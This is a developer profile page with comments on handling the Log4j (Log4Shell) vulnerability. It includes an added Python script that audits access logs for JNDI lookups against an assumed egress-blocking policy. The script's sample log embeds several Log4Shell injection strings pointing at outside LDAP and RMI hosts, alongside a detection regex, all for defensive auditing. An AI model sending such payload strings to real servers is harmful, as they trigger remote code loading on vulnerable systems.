I am a cloud application architect with 10 years' experience in software development in several languages, including Perl, Java and C#. I'm an Irishman living in Calgary, Canada. GitHub on @cubikca.
Location
Calgary, Canada
Education
BSc. Computing and Info Systems, Athabasca University
Unfortunately there's no way of knowing if a third-party vendor has a weird logging configuration and a vulnerable version of Log4j. This makes update #3 now. My company's approach was to block the payload protocols to external hosts first, then focus on finding and patching. This has worked well for us: all logged attempts were blocked and would have used LDAP anyway, which was blocked.
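The approach described in the comment above, block the JNDI callback protocols at egress first and then find and patch, can be checked against your own logs. This is an added example, not the commenter's code: it scans constructed access-log lines for `${jndi:...}` lookups and reports whether an assumed egress policy (LDAP, LDAPS, RMI and IIOP blocked to hosts outside assumed RFC 1918 ranges) would have stopped each callback; the internal-target case shows why the find-and-patch step is still needed.

```python
import re
from ipaddress import ip_address, ip_network
from urllib.parse import urlsplit

# Constructed sample access-log lines (not from the page). The User-Agent field
# carries the well-known ${jndi:<scheme>://<host>...} lookup string.
SAMPLE_LOG = """\
10.0.0.5 - - [11/Dec/2021:03:14:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"
10.0.0.5 - - [11/Dec/2021:03:14:09 +0000] "GET /login HTTP/1.1" 200 512 "-" "${jndi:rmi://203.0.113.10:1099/b}"
10.0.0.7 - - [11/Dec/2021:03:15:01 +0000] "GET /api HTTP/1.1" 200 88 "-" "Mozilla/5.0"
10.0.0.9 - - [11/Dec/2021:03:16:20 +0000] "GET /x HTTP/1.1" 200 88 "-" "${jndi:ldap://10.0.0.20:389/c}"
"""

# Plain ${jndi:scheme://...} lookups only; obfuscated variants are out of scope here.
JNDI_RE = re.compile(r"\$\{jndi:(?P<url>[a-z]+://[^}\s]+)\}", re.IGNORECASE)

# Assumed egress policy: the commenter blocked LDAP to external hosts; the other
# JNDI transports are included as an assumption, not taken from the page.
BLOCKED_EGRESS_SCHEMES = {"ldap", "ldaps", "rmi", "iiop"}

# Assumed internal address space (RFC 1918 plus loopback); adjust to your network.
INTERNAL_NETS = [ip_network(n) for n in
                 ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]

def is_external(host):
    """True if the callback host lies outside the assumed internal ranges."""
    try:
        addr = ip_address(host)
    except ValueError:
        return True  # a hostname, not an IP: treat as external (conservative)
    return not any(addr in net for net in INTERNAL_NETS)

def classify(line):
    """Return (scheme, host, verdict) for a log line, or None if no lookup found."""
    m = JNDI_RE.search(line)
    if not m:
        return None
    url = urlsplit(m.group("url"))
    scheme, host = url.scheme.lower(), url.hostname or ""
    if scheme not in BLOCKED_EGRESS_SCHEMES:
        verdict = "not covered by egress block"
    elif is_external(host):
        verdict = "blocked at egress"
    else:
        verdict = "internal target, egress block does not apply"
    return scheme, host, verdict

def audit(log_text):
    """Classify every lookup in the log as a list of (lineno, scheme, host, verdict)."""
    findings = []
    for lineno, line in enumerate(log_text.splitlines(), start=1):
        result = classify(line)
        if result:
            findings.append((lineno, *result))
    return findings

if __name__ == "__main__":
    for lineno, scheme, host, verdict in audit(SAMPLE_LOG):
        print(f"line {lineno}: {scheme}://{host} -> {verdict}")
```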
Exactly. It's only possible to detect the Log4j version and configuration, and to update it, when you are able to own it or at least customize it.
Thank you for sharing your company's knowledge and effort 😃